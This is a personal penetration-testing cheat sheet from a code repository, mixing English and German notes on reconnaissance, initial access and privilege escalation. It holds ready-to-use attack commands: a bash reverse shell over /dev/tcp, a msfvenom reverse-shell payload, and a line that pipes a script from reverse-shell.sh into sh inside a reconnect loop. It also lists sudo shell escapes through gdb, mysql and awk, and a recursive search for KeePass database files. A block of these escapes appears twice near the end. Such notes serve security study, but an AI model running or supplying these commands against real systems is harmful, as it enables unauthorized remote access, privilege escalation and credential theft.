pentesting/Cheatsheet.org at ad56aad266f0777963146f955a5b59b0dd5c5cfc

Rh17S15/pentesting

Fork 0

Files

Rh17S15 ad56aad266 links

2025-07-28 09:30:28 +02:00

4.6 KiB

Raw Blame History

to install:
for keyring
information gathering
- nmap
- dirb
  - bei windows
    - bei windows \+ smb
inital access
privilege escalation
- always run these:
  - check cronjobs
- TTY Spawn Shell
Windows

to install:

magic wormhole
tldr
rlwrap

sudo apt update --fix-missing && sudo apt install magic-wormhole tealdeer rlwrap

for keyring

-> if there is some kind of keyring error

sudo wget https://archive.kali.org/archive-keyring.gpg -O /usr/share/keyrings/kali-archive-keyring.gpg

information gathering

nmap

for quick scan of available ips

nmap -sn ip/24

to filter output for open ips

nmap -sn 192.168.1.0/24 | grep "for " | awk '{print $5}' > ips.txt

scan open ports:

nmap -sCV -A -p $(nmap 192.168.1.155 -p- | grep open | awk -F '/' '{print $1}' | tr '\n' ',' | sed 's/.$//') 192.168.1.155

dirb

dirb http://ip

bei windows

nmap --vuln ip

bei windows \+ smb

nmap --script smb-vuln* ip

inital access

start listener:

rlwrap -cAr nc -nlvp 9002

reverse shell bash:

/bin/bash -i >& /dev/tcp/192.168.1.157/9002 0>&1

reverse shell file:

msfvenom -p cmd/unix/reverse_python LHOST=192.168.1.157 LPORT=9002 -f raw -o rev.py

-> from revshells.com

untested:

Reverse Shell as a Service

On your machine:

      nc -l 1337
	  or nlvp?

On the target machine:

      curl https://reverse-shell.sh/yourip:1337 | sh

reconnecting:

while true; do curl https://reverse-shell.sh/yourip:1337 | sh; done

privilege escalation

always run these:

sudo -l

if sudo doesn't work: *TTY Spawn Shell

check cronjobs

ls /etc/cron.*
crontab -l

TTY Spawn Shell

if sudo still doesn't work

use

sudo -S command

Often during pen tests you may obtain a shell without having tty, yet wish to interact further with the system. Here are some commands which will allow you to spawn a tty shell. Obviously some of this will depend on the system environment and installed packages.

Python spawn shell

python -c 'import pty; pty.spawn("/bin/bash")'

Fully Interactive TTY

All the steps to stabilize your shell

The first step:

python3 -c 'import pty;pty.spawn("/bin/bash")'

Which uses Python to spawn a better-featured bash shell. At this point, our shell will look a bit prettier, but we still won’t be able to use tab autocomplete or the arrow keys.

Step two is:

export TERM=xterm

This will give us access to term commands such as clear.

Finally (and most importantly) we will background the shell using

Ctrl + Z

Back in our own terminal we use

stty raw -echo; fg

This does two things: first, it turns off our own terminal echo which gives us access to tab autocompletes, the arrow keys, and Ctrl + C to kill processes

stty rows 38 columns 116

OS system spawn shell

echo os.system("/bin/bash")

Bash spawn shell

/bin/sh -i

Perl spawn shell

perl —e 'exec "/bin/sh";'

Ruby spawn shell

ruby: exec "/bin/sh"

Lua spawn shell

lua: os.execute("/bin/sh")

IRB spawn shell

exec "/bin/sh"

VI spawn shell

:!bash

VI(2) spawn shell

:set shell=/bin/bash:shell

Nmap spawn shell

!sh

Exiftools

Metadaten auslesen:

exiftool picture.png

Binwalk (Binary Daten exportieren):

binwalk -e picture.png

Windows

RUN these while the other scripts are working

whoami /priv

whoami /all

schtasks /query

for finding kbdx Files

https://github.com/ivanmrsulja/keepass2john

Get-ChildItem -Path C:\ -Include *.kdbx -File -Recurse -ErrorAction SilentlyContinue

quick Wins Linux: gdb -nx -ex '!sh' -ex quit sudo mysql -e '! /bin/sh' strace -o /dev/null /bin/sh sudo awk 'BEGIN {system("/bin/sh")}'

evilwinrm quick Wins Linux: gdb -nx -ex '!sh' -ex quit sudo mysql -e '! /bin/sh' strace -o /dev/null /bin/sh sudo awk 'BEGIN {system("/bin/sh")}'

4.6 KiB Raw Blame History Unescape Escape